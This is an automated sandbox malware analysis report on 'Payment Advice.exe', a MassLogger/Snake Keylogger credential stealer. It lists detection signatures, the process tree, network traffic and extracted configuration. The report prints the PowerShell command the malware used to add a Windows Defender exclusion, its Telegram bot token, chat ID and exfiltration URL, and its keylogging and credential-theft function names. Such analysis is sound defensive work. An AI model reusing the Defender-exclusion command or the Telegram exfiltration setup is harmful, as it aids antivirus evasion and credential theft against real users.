Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment Advice.exe

Overview

General Information

Sample name:Payment Advice.exe
Analysis ID:1630045
MD5:78ec5a1e11ee68c95a5e339fd492c90e
SHA1:8423eca2ecf74c50f6f688d0555adf9b0a5ace2b
SHA256:eb43ef748d41451eb6cbbf8ca967116280e754d24122b2961472f90c8c00aa9a
Tags:exeuser-threatcat_ch
Infos:

Detection

MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Payment Advice.exe (PID: 2708 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: 78EC5A1E11EE68C95A5E339FD492C90E)
    • powershell.exe (PID: 2852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Payment Advice.exe (PID: 3320 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: 78EC5A1E11EE68C95A5E339FD492C90E)
    • Payment Advice.exe (PID: 5216 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: 78EC5A1E11EE68C95A5E339FD492C90E)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7678702526:AAFF62U3olv_d14DtUBN4vurBh3ZPT14VQ8", "Telegram Chatid": "6440213344"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xefdf:$a1: get_encryptedPassword
          • 0xf307:$a2: get_encryptedUsername
          • 0xed7a:$a3: get_timePasswordChanged
          • 0xee9b:$a4: get_passwordField
          • 0xeff5:$a5: set_encryptedPassword
          • 0x10951:$a7: get_logins
          • 0x10602:$a8: GetOutlookPasswords
          • 0x103f4:$a9: StartKeylogger
          • 0x108a1:$a10: KeyLoggerEventArgs
          • 0x10451:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 22 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Payment Advice.exe.3db1398.2.raw.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            0.2.Payment Advice.exe.3db1398.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Payment Advice.exe.3db1398.2.raw.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                0.2.Payment Advice.exe.3db1398.2.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  0.2.Payment Advice.exe.3db1398.2.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xf1df:$a1: get_encryptedPassword
                  • 0xf507:$a2: get_encryptedUsername
                  • 0xef7a:$a3: get_timePasswordChanged
                  • 0xf09b:$a4: get_passwordField
                  • 0xf1f5:$a5: set_encryptedPassword
                  • 0x10b51:$a7: get_logins
                  • 0x10802:$a8: GetOutlookPasswords
                  • 0x105f4:$a9: StartKeylogger
                  • 0x10aa1:$a10: KeyLoggerEventArgs
                  • 0x10651:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 24 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 2708, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", ProcessId: 2852, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 2708, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", ProcessId: 2852, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe", ParentImage: C:\Users\user\Desktop\Payment Advice.exe, ParentProcessId: 2708, ParentProcessName: Payment Advice.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe", ProcessId: 2852, ProcessName: powershell.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-05T13:08:21.158505+010028032742Potentially Bad Traffic192.168.2.449733132.226.247.7380TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7678702526:AAFF62U3olv_d14DtUBN4vurBh3ZPT14VQ8", "Telegram Chatid": "6440213344"}
                  Multi AV Scanner detection for submitted file
                  Source: Payment Advice.exeVirustotal: Detection: 34%Perma Link
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Payment Advice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.0
                  Source: Payment Advice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: iAbl.pdbSHA256j~^ source: Payment Advice.exe
                  Source: Binary string: iAbl.pdb source: Payment Advice.exe
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 4x nop then jmp 0796B8FFh0_2_0796B20A
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 4x nop then jmp 01875782h5_2_01875367
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 4x nop then jmp 018751B9h5_2_01874F08
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 4x nop then jmp 01875782h5_2_018756AF
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                  Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000346C000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                  Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000349C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000349C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                  Source: Payment Advice.exe, 00000000.00000002.1762503668.000000000308E000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                  Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                  Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                  Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.Payment Advice.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.Payment Advice.exe.3db1398.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Payment Advice.exe PID: 5216, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: Payment Advice.exe
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_0110DE940_2_0110DE94
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_079636B20_2_079636B2
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_079667900_2_07966790
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_0796675A0_2_0796675A
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_079683980_2_07968398
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_079683880_2_07968388
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_079670000_2_07967000
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_07966FF10_2_07966FF1
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_07968DD00_2_07968DD0
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_07966BC80_2_07966BC8
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_0187C1685_2_0187C168
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_018727B95_2_018727B9
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_0187A7E15_2_0187A7E1
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_0187CA585_2_0187CA58
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_01872DD15_2_01872DD1
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_01874F085_2_01874F08
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_01877E685_2_01877E68
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_0187B9D05_2_0187B9D0
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_0187B9E05_2_0187B9E0
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_01874EF85_2_01874EF8
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_01877E675_2_01877E67
                  Source: Payment Advice.exe, 00000000.00000002.1761916348.000000000114E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment Advice.exe
                  Source: Payment Advice.exe, 00000000.00000002.1762503668.0000000002DCD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Payment Advice.exe
                  Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Payment Advice.exe
                  Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment Advice.exe
                  Source: Payment Advice.exe, 00000000.00000002.1766331923.0000000005F90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs Payment Advice.exe
                  Source: Payment Advice.exe, 00000000.00000000.1742483100.0000000000AB4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameiAbl.exe0 vs Payment Advice.exe
                  Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Payment Advice.exe
                  Source: Payment Advice.exe, 00000000.00000002.1767293510.00000000078F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment Advice.exe
                  Source: Payment Advice.exe, 00000000.00000002.1762503668.0000000002D91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Payment Advice.exe
                  Source: Payment Advice.exe, 00000005.00000002.2994910866.000000000041A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Payment Advice.exe
                  Source: Payment Advice.exe, 00000005.00000002.2995068041.00000000012F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Payment Advice.exe
                  Source: Payment Advice.exeBinary or memory string: OriginalFilenameiAbl.exe0 vs Payment Advice.exe
                  Source: Payment Advice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.Payment Advice.exe.3e343a8.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
